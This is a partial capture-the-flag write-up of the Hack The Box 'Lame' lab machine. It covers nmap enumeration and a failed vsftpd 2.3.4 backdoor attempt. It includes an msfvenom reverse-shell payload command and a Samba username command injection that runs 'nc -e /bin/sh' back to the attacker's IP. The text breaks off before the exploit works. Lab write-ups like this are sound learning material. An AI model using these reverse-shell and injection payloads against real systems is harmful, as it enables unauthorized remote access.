This is my writeup for the Lame<\/em> machine in Hackthebox<\/p>\n As usual, we will start with an nmap scan to see what we’re working with:<\/p>\n Looks like we’re working with a server hosting ftp as well as smb. No webserver! A change from the Starting Point machines. Jumping into the ftp server as anonymous gives us nothing, looks empty. We also try the ftp<\/em> user our nmap scripts pulled for us, but the directory is also empty.<\/p>\n Searching the web for exploits for vsftp 2.3.4<\/strong>, we see our friends at Rapid7 have created a metasploit module<\/a> for this. It looks like it exploits a malicious backdoor that was briefly in the specified version of vsftp. After setting the RHOST option for this exploit, we find it indeed doesn’t work.<\/p>\n Searching a bit more, we find an exploit on exploitdb with a possible path to a shell<\/a>. Although it uses the same exploit, it may be worth trying. But it doesn’t work either.<\/p>\n OK, maybe this box isn’t vulnerable to CVE-2011-2523<\/a>. Let’s create a payload using msf venom and see if we can upload it to the FTP server for future usage using this command:<\/p>\n When we try to login to the ftp server as the ftp user and send the file using the Strange that the FTP seems to be open for no reason. Maybe we are missing something, or maybe it’s a red herring. Either way, let’s move onto some SMB exploitation.<\/p>\n There are two open samba ports on the machine. Let’s focus on the one we have an exact version for, since this will make it easier to find an exploit. Some googling points us to a good candidate here<\/a>.<\/p>\n To summarize, if we enter the username “\/=`nohup nc [SOMETHING], we can execute commands we input instead of SOMETHING.<\/p>\n First, let’s start a netcat listener:<\/p>\n Now let’s pass our payload as the username using Note: Let’s jump over to our netcat listener to see if it worked:<\/p>\n Congratulations, we got a connection… A bit of googling reveals that our machine is actually executing the command inside the backticks as it reads the command, which explains the message we get regarding Let’s try using single quotes instead to pass it as a string so our machine doesn’t execute the command-in-a-command:<\/p>\n It works, sort of. We get a password prompt for the user from the SMB server. But reading through it we can see the capitalization is all messed up, and some of the slashes are incorrect.<\/p>\nEnumeration<\/h1>\n
nmap scan report for 10.10.10.3\nHost is up (0.035s latency).\nNot shown: 65530 filtered tcp ports (no-response)\nPORT STATE SERVICE VERSION\n21\/tcp open ftp vsftpd 2.3.4\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to 10.10.14.2\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| vsFTPd 2.3.4 - secure, fast, stable\n|_End of status\n22\/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\n| ssh-hostkey: \n| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)\n|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)\n139\/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n445\/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\n3632\/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n| smb-security-mode: \n| account_used: guest\n| authentication_level: user\n| challenge_response: supported\n|_ message_signing: disabled (dangerous, but default)\n|_smb2-time: Protocol negotiation failed (SMB2)\n| smb-os-discovery: \n| OS: Unix (Samba 3.0.20-Debian)\n| Computer name: lame\n| NetBIOS computer name: \n| Domain name: hackthebox.gr\n| FQDN: lame.hackthebox.gr\n|_ System time: 2022-09-15T19:26:03-04:00\n|_clock-skew: mean: 2h00m22s, deviation: 2h49m45s, median: 20s\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 157.32 seconds<\/code><\/pre>\n
\nLet’s start with some ftp fuzzing, since we have the version thanks to the nmap scripts: vsftp 2.3.4<\/strong><\/p>\nFTP Fuzzing<\/h2>\n
msfvenom -p linux\/x64\/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f elf > r.elf<\/code><\/p>\nput<\/code> command, it fails:
\n553 Could not create file.<\/code>
\nProbably this user doesn’t have permissions to upload files.<\/p>\nSMB Tricks<\/h2>\n
$ sudo nc -nvlp 4444<\/code><\/pre>\nsmbclient<\/code>. The command ‘hangs’, which could indicate good news:<\/p>\n$ smbclient \\\\10.10.10.3\\ -p=445 -U=\"\/=`nohup nc -e \/bin\/sh 10.10.14.9 4444`\"\nnohup: ignoring input and redirecting stderr to stdout\n<\/code><\/pre>\nsmbclient<\/code> requires that every time you need one backslash, you actually need to put two. I think it’s related to escape characters. Hence the seemingly-excessive backslashes in the command. I learned this the hard way doing a starting point machine that required some SMB enumeration<\/em><\/p>\nlistening on [any] 4444 ...\nconnect to [10.10.14.9] from (UNKNOWN) [10.10.14.9] 52988<\/code><\/pre>\n
\n…from ourselves. Queue the DJ Khalid meme.<\/p>\nstderr<\/code> and stdout<\/code> after we execute.<\/p>\n$ smbclient \\\\10.10.10.3\\ -p=445 -U='\/=`nohup nc -e \/bin\/sh 10.10.14.9 4444`'\nPassword for [=`NOHUP NC -E bin\/sh 10.10.14.9 4444`]:\n<\/code><\/pre>\n